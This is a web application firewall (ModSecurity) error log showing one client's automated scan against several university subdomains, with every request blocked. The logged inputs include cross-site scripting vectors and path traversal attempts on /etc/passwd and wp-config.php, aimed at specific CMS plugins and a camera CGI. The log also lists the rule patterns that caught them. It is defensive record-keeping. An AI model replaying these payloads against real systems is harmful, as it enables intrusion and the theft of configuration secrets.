[Tue Aug 29 11:47:25.370861 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhT4AcAAAAD"]
[Tue Aug 29 11:47:25.371627 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhui8sAAAAr"]
[Tue Aug 29 11:47:25.396596 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAj114sAAAAa"]
[Tue Aug 29 11:47:25.425614 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhzvr0AAAAx"]
[Tue Aug 29 11:47:25.444363 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhT4AgAAAAD"]
[Tue Aug 29 11:47:25.444568 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhui80AAAAr"]
[Tue Aug 29 11:47:25.445366 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAhzvr4AAAAx"]
[Tue Aug 29 11:47:25.467499 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjZRagAAAAS"]
[Tue Aug 29 11:47:25.468002 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAhzvr8AAAAx"]
[Tue Aug 29 11:47:25.480359 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjL8UEAAAAR"]
[Tue Aug 29 11:47:26.384744 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAj-eTQAAAAE"]
[Tue Aug 29 11:47:26.385728 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjZRawAAAAS"]
[Tue Aug 29 11:47:26.387026 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XsCo-f0AAAjCbGcAAAAB"]
[Tue Aug 29 11:47:26.401058 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjdQOcAAAAZ"]
[Tue Aug 29 11:47:26.409182 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjtc1MAAAAX"]
[Tue Aug 29 11:47:26.414098 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAi@TD8AAAAM"]
[Tue Aug 29 11:47:27.366369 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14X8Co-f0AAAfECD4AAAAO"]
[Tue Aug 29 11:47:27.396456 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAhzvsIAAAAx"]
[Tue Aug 29 11:47:27.409413 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAj-eTkAAAAE"]
[Tue Aug 29 11:47:27.410880 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAjIhp4AAAAJ"]
[Tue Aug 29 11:47:27.420892 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAhzvsMAAAAx"]
[Tue Aug 29 11:47:27.447635 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAhui9QAAAAr"]
[Tue Aug 29 11:47:28.393409 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14YMCo-f0AAAjM7E0AAAAT"]
[Tue Aug 29 11:47:28.470339 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14YMCo-f0AAAjcHZkAAAAY"]
[Tue Aug 29 11:47:31.443076 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAhl0JkAAAAi"]
[Tue Aug 29 11:47:31.451968 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjrbIsAAAAP"]
[Tue Aug 29 11:47:31.452550 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAi2yIcAAAAN"]
[Tue Aug 29 11:47:31.474937 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjav2YAAAAV"]
[Tue Aug 29 11:47:31.485007 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjM7FAAAAAT"]
[Tue Aug 29 11:47:32.615295 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14ZMCo-f0AAAjtc2cAAAAX"]
[Tue Aug 29 11:47:32.835561 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0J8AAAAi"]
[Tue Aug 29 11:47:32.856740 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0KAAAAAi"]
[Tue Aug 29 11:47:32.875835 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9D4AAAAA"]
[Tue Aug 29 11:47:32.914719 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0KMAAAAi"]
[Tue Aug 29 11:47:32.916104 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9EAAAAAA"]
[Tue Aug 29 11:47:33.409406 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZcCo-f0AAAjW9EUAAAAA"]
